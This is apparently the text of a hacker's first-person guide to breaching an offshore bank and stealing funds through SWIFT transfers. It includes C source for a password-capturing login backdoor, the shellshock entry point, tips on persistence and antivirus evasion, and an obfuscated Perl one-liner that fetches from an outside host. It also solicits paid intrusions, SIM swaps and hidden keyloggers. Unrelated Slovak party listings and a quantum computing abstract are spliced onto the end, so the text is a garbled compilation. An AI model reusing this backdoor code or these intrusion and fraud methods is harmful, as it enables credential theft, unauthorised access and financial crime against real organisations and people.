    When I published my latest DIY guide [1] I did not reveal the details of the sonicwall exploit that I had used to hack Hacking Team, as it was very useful for other hacks (such as this one) and I still had not finished having fun with it. Determined then to hack Hacking Team, I spent weeks reverse engineering their sonicwall ssl-vpn model, and even managed to find several memory corruption vulnerabilities that were more or less difficult to exploit, before I realized that the device was easily exploitable with shellshock [2]. When shellshock came out, many sonicwall devices were vulnerable, with only a request to cgi-bin/welcome and a payload in the user-agent. Dell released a security update and an advisory for these versions. The version used by Hacking Team and this bank had the vulnerable bash version, but the cgi requests did not trigger the shellshock- except for the requests to a shell script, and there was one accessible: cgi-bin/jarrewrite.sh. This seems to have escaped Dell's notice, since they never released a security update or an advisory for that version of the sonicwall. And, kindly, Dell had setuid’d root on dos2unix, leaving the device easy to root.
    In my last guide many read that I spent weeks researching a device until I found an exploit, and assumed that it meant that I was some kind of elite hacker. The reality, that is, the fact that it took me two weeks to realize that it was trivially exploitable with shellshock, is perhaps less flattering to me, but I think it is also more inspiring. Shows that you can really do this for yourself. You don't need to be a genius, I certainly am not. Actually my work against Hacking Team started a year earlier. When I discovered Hacking Team and the Gamma Group in the CitizenLab investigations [3][4], I decided to explore a bit and see if I could find anything. I didn't get anywhere with Hacking Team, but I was lucky with Gamma Group, and I was able to hack their customer support portal with basic sql injection and file upload vulnerabilities [5][6]. However, although the customer support server gave me a pivot towards the internal network of Gamma Group, I was unable to penetrate further into the company. From this experience with the Gamma Group and other hacks, I realized that I was really limited by my lack of knowledge about privilege escalation and lateral movement in windows domains, active directory and windows in general. So I studied and practiced (see section 11), until I felt I was ready to pay a visit to Hacking Team almost a year later. The practice paid off, and this time I was able to make a complete commitment from the company [7]. Before I realized that I could enter with shellshock, I was willing to spend happy whole months of life studying exploit development and writing a reliable exploit for one of the memory corruption vulnerabilities I had encountered. I just knew that Hacking Team needed to be exposed, and that it would take me as much time as necessary and learn what I had to learn to get it. To perform these hacks you don't need to be bright. You don't even need great technical knowledge. You just need dedication, and believe in yourself.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://es.wikipedia.org/wiki/Shellshock_(error_de_software)
    [3] https://citizenlab.ca/tag/hacking-team/
    [4] https://citizenlab.ca/tag/finfisher/
    [5] https://theintercept.com/2014/08/07/leaked-files-german-spy-company-helped-bahrain-track-arab-spring-protesters/
    [6] https://www.exploit-db.com/papers/41913
    [7] https://web.archive.org/web/20150706095436/https://twitter.com/hackingteam
    [4.2 - The Backdoor]
    Part of the backdoor I prepared for Hacking Team (see the first footnote in section 6) was a simple wrapper on the login page to capture passwords:
    #include
    #include
    #include
    #include
    #include
    int main()
    {
    char buf[2048];
    int nread, pfile;
    /* pull the log if we send a special cookie */
    char *cookies = getenv("HTTP_COOKIE");
    if (cookies && strstr(cookies, "our private password")) {
    write(1, "Content-type: text/plainnn", 26);
    pfile = open("/tmp/.pfile", O_RDONLY);
    while ((nread = read(pfile, buf, sizeof(buf))) > 0)
    write(1, buf, nread);
    exit(0);
    }
    /* the parent stores the POST data and sends it to the child, which is the actual login program */
    int fd[2];
    pipe(fd);
    pfile = open("/tmp/.pfile", O_APPEND | O_CREAT | O_WRONLY, 0600);
    if (fork()) {
    close(fd[0]);
    while ((nread = read(0, buf, sizeof(buf))) > 0) {
    write(fd[1], buf, nread);
    write(pfile, buf, nread);
    }
    write(pfile, "n", 1);
    close(fd[1]);
    close(pfile);
    wait(NULL);
    } else {
    close(fd[1]);
    dup2(fd[0],0);
    close(fd[0]);
    execl("/usr/src/EasyAccess/www/cgi-bin/.userLogin",
    "userLogin", NULL);
    }
    }
    In the case of Hacking Team, they were logging on to the VPN with single-use passwords, so the VPN gave me access only to the network, and from there it took an extra effort to get domain admins on their network. In the other guide I wrote about side passes and privilege escalation in windows domains [1]. In this case, on the other hand, it was the same Windows domain passwords that were used to authenticate against the VPN, so I could get a good user password, including that of the domain admin. Now I had full access to his network, but usually this is the easy part. The most complicated part is to understand how they operate and how to get what you want out of their network.
    [1] https://www.exploit-db.com/papers/41914
    [4.3 - Fun facts]
    Following the investigation they did about the hacking, I found it interesting to see that, by the same time I did it, the bank could have been compromised by someone else through a targeted phishing email [1]. As the old saying goes, "give a man an exploit and he will have access for a day, teach phishing and he will have access all his life" [2]. The fact that someone else, by chance and at the same time as me, put this small bank in the spotlight (they registered a domain similar to the real domain of the bank to be able to phish from there) suggests that bank hacks occur with much more frequently than is known.
    A fun suggestion for you to follow the investigations of your hacks is to have a backup access, one that you won't touch unless you lose normal access. I have a simple script that expects commands once a day, or less, just to maintain long-term access in case they block my regular access. Then I had a powershell empire [3] calling home more frequently to a different IP, and I used empire to launch meterpreter [4] against a third IP, where I did most of my work. When PWC started investigating the hacking, they found my use of empire and meterpreter and cleaned those computers and blocked those IPs, but they didn't detect my backup access. PWC had placed network monitoring devices, in order to analyze the traffic and see if there were still infected computers, so I didn't want to connect much to their network. I only launched mimikatz once to get the new passwords, and from there I could continue my research by reading their emails in the outlook web access.
    [1] page 47, Project Pallid Nutmeg.pdf, in torrent
    [2] https://twitter.com/thegrugq/status/563964286783877121
    [3] https://github.com/EmpireProject/Empire
    [4] https://github.com/rapid7/metasploit-framework
    [5 - Understand Banking Operations]
    To understand how the bank operated, and how I could get money, I followed the techniques that I summarized in [1], in section “13.3 - Internal Recognition”. I downloaded a list of all file names, grepped for words like "SWIFT" and "transfer", and downloaded and read all files with interesting names. I also looked for emails from employees, but by far the most useful technique was to use keyloggers and screenshots to see how bank employees worked. I didn't know it at the time, but for this, Windows has a very good monitoring tool [2]. As described in technique no. 5 of section 13.3 in [1], I made a capture of the keys pressed throughout the domain (including window titles), I did a grep in search of SWIFT, and found some employees opening ‘SWIFT Access Service Bureau - Logon’. For those employees, I ran meterpreter as in [3], and used the post/windows/gather/screen_spy module to take screenshots every 5 seconds, to see how they worked. They were using a remote citrix app from the bottomline company [4] to access the SWIFT network, where each payment message SWIFT MT103 had to go through three employees: one to "create" the message, one to "verify" it, and another to "authorize it." Since I already had all their credentials thanks to the keylogger, I could easily perform all three steps myself. And from what I knew after seeing them work, they didn't review the SWIFT messages sent, so I should have enough time to get the money from my bank drops before the bank realized and tried to reverse the transfers.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://cyberarms.wordpress.com/2016/02/13/using-problem-steps-recorder-psr-remotely-with-metasploit/
    [3] https://www.trustedsec.com/blog/no_psexec_needed/
    [4] https://www.bottomline.com/uk/products/bottomline-swift-access-services
    _______________________________________
    / Whoever robs a thief, gets 100 years
    of forgiveness. /
    ---------------------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    [6 - Send the money]
    I had no idea what I was doing, so I was discovering it along the way. Somehow, the first transfers I sent went well. The next day, I screwed up by sending a transfer to Mexico that ended my fun. This bank sent its international transfers through its correspondent account in Natwest. I had seen that the correspondent account for transfers in pounds sterling (GBP) appeared as NWBKGB2LGPL, while for the others it was NWBKGB2LXXX. The Mexican transfer was in GBP, so I assumed that I had to put NWBKGB2LGPL as a correspondent. If I had prepared it better I would have known that the GPL instead of XXX indicated that the payment would be sent through the UK Fast Payment Service, rather than as an international transfer, which obviously will not work when you are trying of sending money to Mexico. So the bank got an error message. On the same day I also tried to send a payment of £200k to the UK using NWBKGB2LGPL, which was not made because 200k exceeded the shipping limit by fast payments, and would have had to use NWBKGB2LXXX instead. They also received an error message for this. They read the messages, investigated it, and found the rest of my transfers.
    [7 - The loot]
    From what I write, you can get a complete idea of what my ideals are and to what things I give my support. But I would not like to see anyone in legal trouble for receiving expropriated funds, so not another word of where the money went. I know that journalists are probably going to want to put some number on how many dollars were distributed in this hack and similar ones, but I prefer not to encourage our perverse habit of measuring the actions just by their economic value. Any action is admirable if it comes from love and not from the ego. Unfortunately those above, the rich and powerful, public figures, businessmen, people in "important" positions, those that our society most respects and values, those have been placed where they are based on acting more since the ego than from love. It is in the simple, humble and "invisible" people that we should look at and whom we should admire.
    [8 - Cryptocurrencies]
    Redistributing expropriated money to Chilean projects seeking positive social change would be easier and safer if those projects accepted anonymous donations via cryptocurrencies such as monero, zcash, or at least bitcoin. It is understood that many of these projects have an aversion to cryptocurrencies, as they resemble some strange hypercapitalist dystopia rather than the social economy we dream of. I share their skepticism, but I think they are useful to allow donations and anonymous transactions, by limiting government surveillance and control. Same as cash, whose use many countries are trying to limit for the same reason.
    [9 - Powershell]
    In this operation, as in [1], I used a lot of powershell. Then, powershell was super cool, you could do almost anything you wanted, without antivirus detection and with very little forensic footprint. It happens that with the introduction of AMSI [2], offensive powershell is retiring. Today offensive C# is what is on the rise, with tools like [3][4][5][6]. AMSI is going to get to .NET for 4.8, so the tools in C# probably still have a couple of years left before they get dated. And then we will use C or C++ again, or maybe Delphi will become fashionable again. The specific tools and techniques change every few years, but basically it is not so much what changes, today hacking is essentially the same thing it was in the 90s. In fact, all the powershell scripts used in this guide and in the previous one are still perfectly usable today, after a little obfuscation of your own.
    [1] https://www.exploit-db.com/papers/41914
    [2] https://medium.com/@byte_St0rm/adventures-in-the-wonderful-world-of-amsi-25d235eb749c
    [3] https://cobbr.io/SharpSploit.html
    [4] https://github.com/tevora-threat/SharpView
    [5] https://www.harmj0y.net/blog/redteaming/ghostpack/
    [6] https://web.archive.org/web/20191114034546/https://rastamouse.me/2019/08/covenant-donut-tikitorch/
    ___________________________
    / Fo Sostyn, Fo Ordaag
    Financial Sector Fuck Off /
    ---------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    [10 - Torrent]
    Privacy for the weak, transparency for the powerful.
    Offshore banking provides executives, politicians and millionaires with privacy from of their own government. Exposing them may sound hypocritical on my part, since I am generally in favor of privacy and against government oversight. But the law was already written by and for the rich: it protects its system of exploitation, with some limits (such as taxes) so that society can function and the system does not collapse under the weight of its own greed. So no, privacy is not the same for the powerful, when it allows them to evade the limits of a system designed to give them privileges; and privacy for the weak, whom it protects from a system designed to exploit them.
    Even journalists with the best intentions find it impossible to study such a huge amount of material and know what will be relevant for people in different parts of the world. When I leaked the Hacking Team files, I gave The Intercept a copy of the emails one month in advance. They found a couple of the 0days that Hacking Team was using, previously reported them to MS and Adobe and published a few stories once the leak was made public. There is no point of comparison with the enormous amount of articles and research that came after the complete leak to the public. Seeing it this way, and also considering the (not) editorialized publication [1] of the Panama papers, I think that a public and complete leak of this material is the right choice.
    [1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-protect-western-1-from-panama-leak/
    Psychologists found that those who are lower in the hierarchies tend to understand and empathize with those at the top, but vice versa is less common. This explains why, in this sexist world, many men joke about their inability to understand women, as if it were an irresolvable mystery. Explains why the rich, if they stop to think about those who live in poverty, give advice and "solutions" so alien to reality that we want to laugh. Explain why we revere executives as brave who take risks. What do they risk, beyond their privilege? If all their ventures fail, they will have to live and work like the rest of us. It also explains why there will be many who accuse me of being irresponsible and dangerous by leaking this without redaction. They feel the "danger" around an offshore bank and its customers much more intensely than they feel the misery of those dispossessed by this unfair and unequal system. And this leak of their finances, is it a danger to them, or perhaps only to their position at the top of a hierarchy that should not even exist?

    Translation: “They vilify us, these infamous people; When the only difference is that they steal from the poor, protected by the law, heaven knows, and we get the rich under the sole protection of our own courage. Don't you have to prefer to be one of us, rather than indulge those villains in search of a job? - Captain Bellamy”
    [11 - Learn to hack]
    You don't start hacking well. You start hacking shit, thinking it's good, and then gradually you get better. That is why I always say that one of the most valuable virtues is persistence.
    - Octavia Butler's advice for the APT candidate
    The best way to learn to hack is by hacking. Put together a laboratory with virtual machines and start testing things, taking a break to investigate anything you don't understand. At the very least you will want a windows server as a domain controller, another normal Windows vm attached to the domain, and a development machine with visual studio to compile and modify tools. Try to make an office document with macros that launch meterpreter or another RAT, and try meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying, psexec and other lateral movement techniques[1]; as well as the other scripts, tools and techniques mentioned in this guide and in the previous one[2]. At first you can disable windows defender, but then try it all by having it activated [3][4] (but deactivating the automatic sending of samples). Once you're comfortable with all that, you'll be ready to hack 99% of companies. There are a couple of things that at some point will be very useful in your learning, such as getting comfortable with bash and cmd.exe, a basic domain of powershell, python and javascript, having knowledge of kerberos [5][6] and active directory [7][8][9][10], and fluent English. A good introductory book is The Hacker Playbook.
    I also want to write a little about things to not focus on if you don't want to entertain the idea of you hacking things just because someone has told you that you are not a “real” hacker if you don't know assembly. Obviously, learn whatever interests you, but I write these lines thinking about those things that you can focus on in order to get practical results if you're looking to hack companies to filter and expropriate. A basic knowledge of web application security [11] is useful, but specializing more in web security is not really the best use of your time, unless you want to make a career in pentesting or chasing bug rewards. CTFs, and most of the resources you'll find when looking for information about hacking, generally focus on skills such as web security, reverse engineering, exploit development, etc. These things make sense by understanding them as a way to prepare people for careers in the industry, but not for our goals. Intelligence agencies can afford to have a team dedicated to the most advanced techniques in fuzzing, a team working on exploit development with a guy investigating exclusively the new techniques of heap manipulation, etc. We don't have the time or the resources for that. The two most important skills for practical hacking are phishing [12] and social engineering to get initial access, and then being able to climb and move through the Windows domains.
    [1] https://hausec.com/2019/08/12/offensive-lateral-movement/
    [2] https://www.exploit-db.com/papers/41914
    [3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
    [4] https://www.trustedsec.com/blog/discovering-the-anti-virus-signature-and-bypassing-it/
    [5] https://www.tarlogic.com/en/blog/how-kerberos-works/
    [6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
    [7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
    [8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
    [9] https://adsecurity.org/
    [10] https://github.com/infosecn1nja/AD-Attack-Defense
    [11] https://github.com/jhaddix/tbhm
    [12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
    [12 - Recommended Reading]
    _______________________________________
    / When the scientific level of a world
    | far exceeds its level of solidarity, |
    that world destroys itself. /
    --------------------------------------
    _.---._ . .
    * .' '. *
    * _.-~===========~-._
    . (___________________) . *
    .' _______/ .'
    .' .'
    '
    - me
    Almost all hacking today is done by black hat hackers, for personal gain; or for white hat hackers, for the benefit of the shareholders (and in defense of the banks, companies and states that are annihilating us and the planet in which we live); and by military and intelligence agencies, as part of their war and conflict agenda. Seeing that this our world is already at the limit, I have thought that, in addition to these technical tips for learning to hack, I should include some resources that have been very important for my development and have guided me in the use of my hacking knowledge.
    * Ami: El Niño de las Estrellas – Enrique Barrios
    * La Anarquía Funciona: https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-funciona
    * Viviendo Mi Vida – Emma Goldman
    * The Rise and Fall of Jeremy Hammond, Enemy of the State: https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-hammond-enemy-of-the-state-183599/
    Este cuate y el hack de HBGary fueron una inspiración
    * Días de Guerra, Noches de Amor – Crimethinc
    * Momo – Michael Ende
    * Cartas a un joven poeta – Rilke
    * Dominion (Documentary)
    "We cannot believe that, if we do not look, what we do not want to see will not happen"
    - Tolstoy in Первая ступень
    Bash Back!
    [13 - Heal]
    The hacker world has a high incidence of depression, suicides and certain battles with mental health. I don't think it's because of hacking, but because of the kind of environment that hackers mostly come from. Like many hackers, I grew up with little human contact: I was a girl raised by the internet. I have my struggles with depression and emotional numbness. Willie Sutton is frequently quoted as saying that he robbed banks because "that's where the money is," but the quote is incorrect. What he really said was:
    Why did I rob banks? Because I enjoyed it. I loved to do it. I was more alive when I was inside a bank, in full robbery, than at any other time in my life. I enjoyed it so much that one or two weeks later I was already looking for the next opportunity. But for me money was a minutiae, nothing more.
    Hacking has made me feel alive. It started as a way to self-medicate depression. Later I realized that, in reality, I could do something positive. I don't regret the way I grew up at all, it brought several beautiful experiences to my life. But I knew I couldn't continue living that way. So I began to spend more time away from my computer, with other people, learning to open myself to the world, to feel my emotions, to connect with others, to accept risks and be vulnerable. Things much harder than hacking, but at the mere hour the reward is more worth it. It is still an effort, but even if it is slow and wobbly, I feel that I am on my way.
    Hacking, done with conscience, can also be what heals us. According to Mayan wisdom, we have a gift granted by nature, which we must understand to put it at the service of the community. In [1], it is explained:
    When a person does not accept his job or mission he begins to suffer from seemingly incurable diseases; although he does not die in a short time, but only suffers, in order to wake up or become aware. That is why it is essential that a person who has acquired the knowledge and does his work in the communities must pay his Toj and maintain constant communication with the Creator and his ruwäch q’ij, since he constantly needs their strength and energy. Otherwise, the diseases that caused him to react or take the job could cause damage again.
    If you feel that hacking is feeding your isolation, depression, or other conditions, breathe. Give yourself some time to meet and become aware. You deserve to live happily, with health and fullness.
    ________________________
    < All Cows Are Beautiful >
    ------------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    `'
    [1] Ruxe’el mayab’ K’aslemäl: Raíz y espíritu del conocimiento maya
    https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
    [14 - The Bug Hacktivist Program]
    It seems to me that hacking to get and leak documents of public interest is one of the best ways in which hackers can use their skills for the benefit of society. Unfortunately for us hackers, as in almost every category, the perverse incentives of our economic system do not coincide with what benefits society. So this program is my attempt to make it possible for good hackers to earn a living in an honest way by revealing material of public interest, instead of having to go selling their work to the cybersecurity, cybercrime or business industries. Cyberwar Some examples of companies whose leaks I would love to pay for are:
    - the mining, logging and livestock companies that plunder our beautiful Latin America (and kill land and territory defenders trying to stop them)
    - companies involved in attacks on Rojava such as Baykar Makina or Havelsan
    - surveillance companies such as the NSO group
    - war criminals and birds of prey such as Blackwater and Halliburton
    - private penitentiary companies such as GeoGroup and CoreCivic / CCA, and corporate lobbyists such as ALEC
    Pay attention when choosing where to investigate. For example, it is well known that oil companies are evil: they get rich at the cost of destroying the planet (and back in the 80s the companies themselves already knew about the consequences of their activity [1]). But if you hack them directly, you will have to dive into an incredible amount of boring information about your daily operations. Very likely it will be much easier for you to find something interesting if instead you focus on your lobbyists [2]. Another way to select viable goals is to read stories of investigative journalists (such as [3]), which are interesting but lack solid evidence. And that is exactly what your hacks can find.
    I will pay up to 100 thousand USD for each filtration of this type, according to the public interest and impact of the material, and the labor required in the hacking. Needless to say, a complete leak of the documents and internal communications of any of these companies will be a benefit for society that exceeds those one hundred thousand, but I am not trying to enrich anyone. I just want to provide enough funds so that hackers can earn a decent living doing a good job. Due to time constraints and safety considerations I will not open the material, nor inspect it for myself, but I will read what the press says about it once it has been published, and I will make an estimate of the public interest from there. My contact information is at the end of the guide mentioned above [4].
    How you get the material is your thing. You can use the traditional hacking techniques outlined in this guide and the previous one [4]. You could do a sim swap [5] on a corrupt businessman or politician, and then download his emails and backups from the cloud. You can order an IMSI catcher from alibaba and use it outside its offices. You can do some war-driving (the old way or the new [6]). You may be a person within your organizations that already has access. You can opt for a low-tech old-school style like in [7] and [8], and simply sneak into their offices. Whatever works for you.
    [1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/sep/19/shell-and-exxons-secret-1980s-climate-change-warnings
    [2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
    [3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
    [4] https://www.exploit-db.com/papers/41914
    [5] https://www.vice.com/en_us/article/vbqax3/hackers-sim-swapping-steal-phone-numbers-instagram-bitcoin
    [6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-is-my-keyboard/
    [7] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
    [8] https://en.wikipedia.org/wiki/Unnecessary_Fuss
    [14.1 - Partial payments]
    Are you a good-hearted waitress working in a company of evil [1]? Would you be willing to sneak a physical keylogger into an executive's computer, change your USB charging cable for a modified one [2], hide a microphone in a meeting room where you plan your atrocities, or leave one of these [5] forgotten in some corner of the offices?
    [1] https://en.wikipedia.org/wiki/Evil_maid_attack
    [2] http://mg.lol/blog/defcon-2019/
    [3] https://shop.hak5.org/products/lan-turtle
    Are you good with social engineering and phishing, and did you get a shell on an employee's computer, or did you get your vpn credentials using phishing? But maybe you couldn't get domain admin and download what you wanted?
    Did you participate in bug bounties programs and become an expert in web application hacking, but don't have enough hacker experience to completely penetrate the company?
    Do you have facility with reverse engineering? Scan some evil companies to see what devices they have exposed to the internet (firewall, VPN, and email gateways will be much more useful than things like IP cameras), apply reverse engineering and find some exploitable vulnerability remotely.
    If I can work with you to penetrate the company and get material of public interest, you will also be rewarded for your work. If I don't have the time to work on it myself, at least I will try to advise you on how to continue until you can complete the hacking on your own.
    Supporting those in power to hack and monitor dissidents, activists and the general population is today an industry of several billion dollars, while hacking and exposing those in power is a voluntary and risky job. Turning it into a multi-million dollar industry will certainly not fix that power imbalance, nor will it solve the problems.
    More of society. But I think it will be fun. So ... I want to see people starting to collect their rewards!
    [15 - Abolish prisons]
    Built by the enemy to enclose ideas
    enclosing companions to silence war cries
    it is the center of torture and annihilation
    where the human being becomes more violent
    It is the reflection of society, repressive and prison
    sustained and based on authoritarian logic
    repressed and guarded custodians
    thousands of dams and prisoners are exterminated
    before this schizophrenic and ruthless machine
    companion Axel Osorio giving the strip in the cane
    breaking the isolation and silencing
    fire and war to jail, we are destroying!
    Rap Insurgent - Words In Conflict
    It would be typical to end a hacker zine saying release hammond, release manning, release hamza, release detainees by mounting the дело Сети, etc. I am going to take this tradition to its most radical consequence[1], and to say: we must abolish prisons now! Being a criminal myself, they may think that what happens is that I have a slightly skewed view of the matter. But seriously, it is not even a controversial issue, even the UN almost agrees [2]. So, once and for all, free migrants [3][4][5][6], often imprisoned by those same countries that created the war and the environmental and economic destruction they are fleeing from. Free all those in prison because of the war against those who use drugs [7]. Free all people imprisoned in the war against the poor [8]. All the prisons is hide and ignore the proof of the existence of social problems, instead of fixing them. And until everyone is released, fight the prison system by remembering and keeping in mind those who are trapped in there. Send them honey, letters, helicopters [9], pirate radios [10] and books, and support those who organize from there with [11][12].
    [1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/Davis-Son-obsoletas-las-prisiones-final.pdf
    [2] https://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_Promising_Practices_on_Alternatives_to_Imprisonment.pdf
    [3] https://www.theguardian.com/us-news/2016/dec/21/us-immigration-detention-center-christmas-santa-wish-list
    [4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-images-tucson-arizona
    [5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-Espana_22648665.html
    [6] https://www.nytimes.com/2019/06/26/world/australia/australia-manus-suicide.html
    [7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
    [8] VI, 2. i. The Unpaid Fine: https://scielo.conicyt.cl/scielo.php?script=sci_arttext&pid=S0718-00122012000100005
    [9] p. 10, Libel Nº2. Political bulletin from the High Security Prison
    [10] https://itsgoingdown.org/transmissions-hostile-territory/
    [11] https://freealabamamovement.wordpress.com/f-a-m-pamphlet-who-we-are/
    [12] https://incarceratedworkers.org/
    [16 - Conclusion]
    Our world is upside down [1]. We have a justice system that represents injustice. The law and order are there to create an illusion of social peace, and hide the systematic and profound exploitation, violence, and injustice. Better follow your conscience, and not the law.
    [1] http://resistir.info/livros/galeano_patas_arriba.pdf
    Businessmen enrich themselves by mistreating people and the planet, while care work is largely unpaid. Through the assault on everything communal, we have somehow raised densely populated cities, plagued by loneliness and isolation. The cultural, political and economic system in which we live encourages the worst facets of human nature: greed, selfishness and self-centeredness, competitiveness, lack of compassion and attachment to authority. So, for those who have managed to remain sensitive and compassionate in a cold world, for all the everyday heroines that practice goodness in small things, for all of you who still have a star burning in your hearts: гоpи, гоpи ясно, чтобы не погасло!
    _____________________

    ---------------------

    ^__^
    (oo)_______
    ( (__) )/
    _) / ||----w |
    (.)/ || ||
    Open heart
    Open feeling
    Open understanding
    Leave reason aside
    And let the sun hidden inside you shine
    perl -Mre=eval <<EOF
    ''
    =~(
    '(?'
    .'{'.(
    '`'|'%'
    ).("["^
    '-').('`'|
    '!').("`"|
    ',').'"(\$'
    .':=`'.(('`')|
    '#').('['^'.').
    ('['^')').("`"|
    ',').('{'^'[').'-'.('['^'(').('{'^'[').('`'|'(').('['^'/').('['^'/').(
    '['^'+').('['^'(').'://'.('`'|'%').('`'|'.').('`'|',').('`'|'!').("`"|
    '#').('`'|'%').('['^'!').('`'|'!').('['^'+').('`'|'!').('['^"/").(
    '`'|')').('['^'(').('['^'/').('`'|'!').'.'.('`'|'%').('['^'!')
    .('`'|',').('`'|'.').'.'.('`'|'/').('['^')').('`'|"'").
    '.'.('`'|'-').('['^'#').'/'.('['^'(').('`'|('$')).(
    '['^'(').('`'|',').'-'.('`'|'%').('['^('(')).
    '/`)=~'.('['^'(').'|'.('['^'+').'>|\'
    .'\'.('`'|'.').'|'.('`'|"'").';'.
    '\$:=~'.('['^'(').'/<.*?>//'
    .('`'|"'").';'.('['^'+').('['^
    ')').('`'|')').('`'|'.').(('[')^
    '/').('{'^'[').'\$:=~/('.(('{')^
    '(').('`'^'%').('{'^'#').('{'^'/')
    .('`'^'!').'.*?'.('`'^'-').('`'|'%')
    .('['^'#').("`"| ')').('`'|'#').(
    '`'|'!').('`'| '.').('`'|'/')
    .'..)/'.('[' ^'(').'"})')
    ;$:="."^ '~';$~='@'
    |'(';$^= ')'^'[';
    $/='`' |'.';
    $,= '('
    EOF
    We were born at night.
    We live in it, we hack in it.

    Here we are, we are the rebel dignity,
    the forgotten heart of the Интернет.

    Our fight is for memory and justice,
    and the bad government is filled with criminals and murderers.

    Our fight is for fair and decent work,
    and bad government and corporations buy and sell zero days.
    For all tomorrow.
    For us the happy rebellion of the leaks
    and expropriation.
    For all everything.
    For us nothing.
    From the mountains of the Cyber Southeast,
    _ _ _ ____ _ _
    | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
    | |_| |/ _` |/ __| |/ / | _ / _` |/ __| |/ / |
    | _ | (_| | (__| < | |_) | (_| | (__| <|_|
    |_| |_|__,_|___|_|_ |____/ __,_|___|_|_(_)
    more children: (1)
  • 000001010000000108679967


    Ahojte, 22.novembra si pripravte svoje hyperaktívne dancing shoes, pretože nás čaká Nočná, ktorú nemôžete zmeškať. Crystal Geometry a Hyperaktivist budú headlinovať ďalšiu z našich krásnych žúrok. Kým Crystal Geometry ide ku koreňom industriálneho raveu alebo noise-techna so svojím modulárnym rackom, v Berlíne žijúca venezuelčanka Hyperaktivist eklekticky posúva party do vôd 90’s techna reznutého s acidom, súčasnými šialenými techno-picks a všetkým, čo sa jej cestou zapáči.
    Asistovať bude pražský Trance Kafka so svojou nakladačkou na hranici techna a tranceu, Peal, ktorý vie osobito roztrieskať parket, uvedie to Detekm a uzavrie Matwe.


    FB event: https://www.facebook.com/events/419562405409639/

    ┻┻┻┻┻┻┻┻
    MENŪ:

    Crystal Geometry
    https://www.facebook.com/crystalgeometry
    https://www.residentadvisor.net/dj/crystalgeometry
    https://soundcloud.com/crystal-geometry
    https://www.instagram.com/crystal_geometry/

    Hyperaktivist
    https://www.facebook.com/Hyperaktivist/
    https://www.residentadvisor.net/dj/hyperaktivist
    https://soundcloud.com/hyperaktivist
    https://www.instagram.com/hyperaktivist/

    Trance Kafka
    https://www.facebook.com/trancekafka/
    https://soundcloud.com/trancekafka

    Peal
    https://www.facebook.com/michal.hradsky
    https://soundcloud.com/peal-detwork

    Detekm
    https://www.facebook.com/detekmdetekm/
    https://soundcloud.com/abnormal

    Matwe
    https://www.facebook.com/Matwe
    https://soundcloud.com/matwe


    ┻┻┻┻┻┻┻┻
    TICKET INFO:
    (18+ visitors only)

    E̶a̶r̶l̶y̶ ̶b̶i̶r̶d̶ ̶5̶ ̶€̶ (SOLD OUT / VYPREDANÉ)

    Presale / Predpredaj 7 € (ends 22.11. 22:00)
    Tootoot: https://bit.ly/31y5cis

    On-site / Vstup na mieste 10 €


    ┻┻┻┻┻┻┻┻
    DISCLAIMER:
    Všimli sme si November '89.


    ¿¿¿
    Otázky / Inquiries: nocna@novacvernovka.eu

    ---
    Partnerom živej kultúry v Novej Cvernovke je Nadácia VÚB banka.
    Podujatie z verejných zdrojov podporil Fond na podporu umenia.
  • 000001010000000108675527
  • 000001010000000108666326
    Synapse creator 27.09.2019 - 12:25:38 (modif: 27.09.2019 - 12:40:01) level: 1 UP [4K] New Hardlink Content changed


    Dear friends, dnes je ďalšia Nočná v Novej Cvernovke, tentoraz s Fractions vydávajúcich na Fleisch Records a Nastyou Muravyovou, kľúčovou postavou kyjevskej Cxemy. Budeme mať PKO Soundsystem a bude to dobré.

    Kyberia call: Prvým 10 idčkam, čo mi napíšu do pošty, že chcú ísť, dám friendly vstup na bráne za 5€ :)

    FB event: https://www.facebook.com/events/2446560142293792/

    S páskou z Bielej Noci vstup za 5€ (door only).
    Predpredaj za 6€ k dispo do 22:00 tu: https://tootoot.fm/en/events/5d6d1e86faf9de0288912d6c?fbclid=IwAR30t2I3_lHXk51lwCGEZ6ialrwaud_sK8Btd4TxB7Fpbw7xS4syL267Uko

    Na mieste 8€.

    See you na bare :)
  • 000001010000000108664549

    Quantum Supremacy Using a Programmable Superconducting Processor


    September 21, 2019
    Eleanor G. Rieffel
    NASA Ames Research Center
    Moffett Field, California

    Note: this paper was originally posted on NASA NTRS but was then removed, NASA has not provided a reason for its removal.

    Quantum supremacy using a programmable superconducting processor Google AI Quantum and collaboratorsy The tantalizing promise of quantum computers is that certain computational tasks might be executed exponentially faster on a quantum processor than on a classical processor. A fundamental challenge is to build a high-delity processor capable of running quantum algorithms in an exponentially large computational space.

    Here, we report using a processor with programmable superconducting qubits to create quantum states on 53 qubits, occupying a state space 253 ˘1016. Measurements from repeated experiments sample the corresponding probability distribution, which we verify using classical simulations. While our processor takes about 200 seconds to sample one instance of the quantum circuit 1 million times, a state-of-the-art supercomputer would require approximately 10,000 years to perform the equivalent task.

